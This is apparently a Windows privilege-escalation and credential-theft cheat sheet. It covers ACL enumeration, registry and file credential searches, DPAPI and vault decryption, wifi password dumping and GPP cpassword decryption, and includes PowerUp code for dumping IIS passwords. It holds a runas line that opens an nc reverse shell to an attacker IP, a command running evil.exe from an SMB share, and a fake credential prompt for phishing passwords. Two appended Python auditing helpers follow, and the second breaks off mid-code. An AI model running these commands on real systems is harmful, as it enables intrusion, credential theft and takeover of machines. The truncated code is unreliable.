accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Run at startup
Check if you can overwrite some registry key or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autoruns locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Look for possible third party weird/vulnerable drivers
driverquery
driverquery.exe /fo table
driverquery /SI
If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:
Arbitrary Kernel Rw Token Theft
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
For more information about how to abuse this check:
Writable Sys Path +Dll Hijacking Privesc
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Check for other known computers hardcoded in the hosts file
type C:\Windows\System32\drivers\etc\hosts
Network Interfaces & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Check for restricted services from the outside
netstat -ano #Opened ports?
Routing Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP Table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
Firewall Rules
Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)
More commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
The binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI if nc should be allowed by the firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
To easily start bash as root, you can try --default-user root
You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows Credentials
Winlogon Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Credentials manager / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like users can now store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Using runas with a provided set of credentials. Note that runas.exe has no password argument: it prompts for the password interactively, so you need an interactive session to use it this way:
C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"
Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or the Empire PowerShell module can also be used to dump these credentials.
DPAPI
The Data Protection API (DPAPI) provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to contribute significantly to the entropy.
DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets. In scenarios involving system encryption, it utilises the system's domain authentication secrets.
Encrypted user RSA keys, by using DPAPI, are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user's Security Identifier. The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file, typically consists of 64 bytes of random data. (It is important to note that access to this directory is restricted, preventing listing of its contents via the dir command in CMD, though it can be listed through PowerShell).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
Usually, the credential files protected by the master password are located in:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt.
You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).
PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently. The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
To decrypt PS credentials from the file containing them you can do:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Saved RDP connections
You can find them in HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\ and in HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently executed commands
HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Remote Desktop Credential Manager
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with the appropriate /masterkey to decrypt any .rdg files.
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module.
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
This code was extracted from PowerUP:
function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"

    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable

        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")

        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
            # Get application pool name
            $PoolName = $_

            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd

            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd

            # Check if credentials exists
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
            }
        }

        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
            # Get Virtual Directory Name
            $VdirName = $_

            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd

            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd

            # Check if credentials exists
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
            }
        }

        # Check if any passwords were found
        if( $DataTable.rows.Count -gt 0 ) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}
SCClient / SCCM
Check if C:\Windows\CCM\SCClient.exe exists.
Installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading (Info from https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Files and Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys, so you should check if there is anything interesting in there:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
If the ssh-agent service is not running and you want it to automatically start on boot, run:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
tip
It seems that this technique isn't valid anymore. I tried to create some ssh keys, add them with ssh-add and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the use of dpapi.dll during the asymmetric key authentication.
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
You can also search for these files using metasploit: post/windows/gather/enum_unattend
Example content:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
SAM & SYSTEM backups
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Search for a file called SiteList.xml
Cached GPP Password
A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.
To mitigate this risk, a function was developed to scan for locally cached GPP files containing a non-empty "cpassword" field. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to Windows Vista) for these files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS Web Config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Example of web.config with credentials:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
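The three formats above (unattend.xml/sysprep.xml AutoLogon and LocalAccount passwords, GPP files with a cpassword attribute, and web.config Forms credentials) can be audited with one parser. The following is an added example written for this page, not HackTricks or PowerUP code; the sample documents are constructed from the fragments shown above plus the page's cpassword value, and the wcm namespace URI is the one standard unattend files declare. It reports findings without decrypting cpassword; gpp-decrypt above does that.

```python
"""Report credentials left behind in Windows configuration XML (added example, not HackTricks code).
Covers the three formats discussed above and only reports what it finds, so the file can be cleaned up:
  unattend.xml/sysprep.xml : <AutoLogon><Password> and <LocalAccount><Password>
  Group Policy Preferences : any element carrying a non-empty cpassword attribute
  IIS web.config           : <credentials passwordFormat="Clear"><user password=...>"""
import base64
import xml.etree.ElementTree as ET
from dataclasses import dataclass

REDACTED = "*SENSITIVE*DATA*DELETED*"  # marker sysprep leaves after it has cleaned a password


@dataclass
class Finding:
    kind: str      # "unattend", "gpp" or "webconfig"
    account: str   # user the secret belongs to ("" if the file does not say)
    location: str  # where in the document it was found
    secret: str    # decoded value for unattend files, verbatim otherwise

def _local(tag):  # strip a namespace: '{urn:schemas-microsoft-com:unattend}Password' -> 'Password'
    return tag.rsplit("}", 1)[-1]

def _child(node, name):  # first direct child with that local name, or None
    return next((c for c in node if _local(c.tag) == name), None)

def _decode_unattend(value):
    """Unattend passwords are normally base64; tolerate sloppy padding (the sample above has one
    '=' too many) and fall back to the raw text when the value is not base64 at all."""
    stripped = value.strip().rstrip("=")
    try:
        text = base64.b64decode(stripped + "=" * (-len(stripped) % 4), validate=True).decode("utf-8").strip()
    except (ValueError, UnicodeDecodeError):
        return value.strip()
    return text if text.isprintable() else value.strip()

def _scan_unattend(root):
    found = []
    for node in root.iter():
        parent = _local(node.tag)
        pw = _child(node, "Password") if parent in ("AutoLogon", "LocalAccount") else None
        if pw is None:
            continue
        # Real files nest <Value>/<PlainText> under <Password>; the page's sample inlines the text.
        value_node = _child(pw, "Value")
        value = ((value_node.text if value_node is not None else pw.text) or "").strip()
        if not value or value == REDACTED:
            continue
        plain = _child(pw, "PlainText")
        is_plain = plain is not None and (plain.text or "").strip().lower() == "true"
        name_node = _child(node, "Username")  # AutoLogon uses Username, LocalAccount uses Name
        if name_node is None:
            name_node = _child(node, "Name")
        account = (name_node.text or "").strip() if name_node is not None else ""
        found.append(Finding("unattend", account, parent + "/Password",
                             value if is_plain else _decode_unattend(value)))
    return found

def _scan_gpp(root):
    found = []
    for node in root.iter():
        cpassword = node.attrib.get("cpassword", "")
        if not cpassword:
            continue
        # Groups.xml uses userName; Services/ScheduledTasks use accountName/runAs; Drives use username.
        account = next((node.attrib[k] for k in ("userName", "username", "accountName", "runAs")
                        if node.attrib.get(k)), "")
        found.append(Finding("gpp", account, _local(node.tag) + "@cpassword", cpassword))
    return found

def _scan_webconfig(root):
    found = []
    for creds in root.iter():
        if _local(creds.tag) != "credentials":
            continue
        fmt = creds.attrib.get("passwordFormat", "Clear")  # ASP.NET defaults to Clear
        for user in creds:
            if _local(user.tag) == "user" and user.attrib.get("password"):
                found.append(Finding("webconfig", user.attrib.get("name", ""),
                                     f"credentials[passwordFormat={fmt}]/user", user.attrib["password"]))
    return found

def scan_xml_text(text):
    """Run all three scanners over one XML document (str or bytes); use on any file from the lists above."""
    root = ET.fromstring(text)
    return _scan_unattend(root) + _scan_gpp(root) + _scan_webconfig(root)

# Constructed samples: the unattend and web.config fragments from the page (the unattend one with the
# wcm namespace declared so it parses) and a minimal Groups.xml carrying the page's cpassword value.
SAMPLE_UNATTEND = """<component name="Microsoft-Windows-Shell-Setup"
  xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <AutoLogon><Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
    <Enabled>true</Enabled><Username>Administrateur</Username></AutoLogon>
  <UserAccounts><LocalAccounts><LocalAccount wcm:action="add">
    <Password>*SENSITIVE*DATA*DELETED*</Password><Group>administrators;users</Group>
    <Name>Administrateur</Name></LocalAccount></LocalAccounts></UserAccounts>
</component>"""
SAMPLE_GROUPS_XML = """<Groups><User name="backup_svc"><Properties action="U" userName="backup_svc"
  cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/></User></Groups>"""
SAMPLE_WEBCONFIG = """<authentication mode="Forms"><forms name="login" loginUrl="/admin">
  <credentials passwordFormat = "Clear"><user name="Administrator" password="SuperAdminPassword" /></credentials>
</forms></authentication>"""
```

Run scan_xml_text over each file found by the dir/Get-ChildItem commands in these sections and treat every non-redacted finding as a credential to rotate and remove.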
OpenVPN credentials
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
    $encryptedbytes = $item.'auth-data'
    $entropy = $item.'entropy'
    $entropy = $entropy[0..(($entropy.Length)-2)]   # drop the last byte of the stored entropy
    $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedbytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
    Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Log files
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
You can always ask the user to enter his credentials or even the credentials of a different user if you think he can know them (notice that asking the client directly for the credentials is really risky):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Possible filenames containing credentials
Known files that some time ago contained passwords in clear-text or Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Credentials in the RecycleBin
You should also check the Bin to look for credentials inside it
To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html
Inside the registry
Other possible registry keys with credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Browsers History
You should check for dbs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers, as some passwords may be stored there.
Tools to extract passwords from browsers:
- Mimikatz:
dpapi::chrome
- SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) is a technology built into the Windows operating system that allows intercommunication between software components written in different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This registry view is created by merging HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.
Inside the CLSIDs of this registry you can find the child key InProcServer32, which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.
To learn how attackers use COM Hijacking as a persistence mechanism check:
Generic Password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Tools that search for passwords
MSF-Credentials Plugin is a msf plugin. I have created this plugin to automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas automatically searches for all the files containing passwords mentioned in this page.
Lazagne is another great tool to extract passwords from a system.
The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Shared memory segments, referred to as pipes, enable process communication and data transfer.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a privileged process that communicates via a pipe you can mimic provides an opportunity to gain higher privileges by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.
Also the following tool allows intercepting a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows listing and inspecting all the pipes to find privescs: https://github.com/cyberark/PipeViewer
Misc
File Extensions that could execute stuff in Windows
Check out the page https://filesec.io/
Monitoring Command Lines for passwords
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
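An added example (not HackTricks code) that does the comparison the loop above leaves to the eye: it diffs two snapshots and flags the new command lines that carry a credential, using the invocation shapes shown on this page (inline runas password, net use, -p, key=value). The snapshots are constructed; snapshot_windows() gathers real ones via WMI.

```python
"""Review new process command lines for credentials passed as arguments
(added example for this page, not HackTricks code). It keeps the previous snapshot,
reports only command lines that are new (what Compare-Object marks with =>) and
flags the ones carrying a secret. Snapshots are lists of strings so the logic runs
offline; snapshot_windows() collects live ones through WMI, as the loop above does."""
import re
import subprocess

# Credential-bearing invocations shown on this page plus a few common Windows forms.
# Each pattern captures the secret so the report can redact it.
CRED_PATTERNS = [
    # runas ... /user:NAME PASSWORD "cmd"   (a bare token after the user that is not a command)
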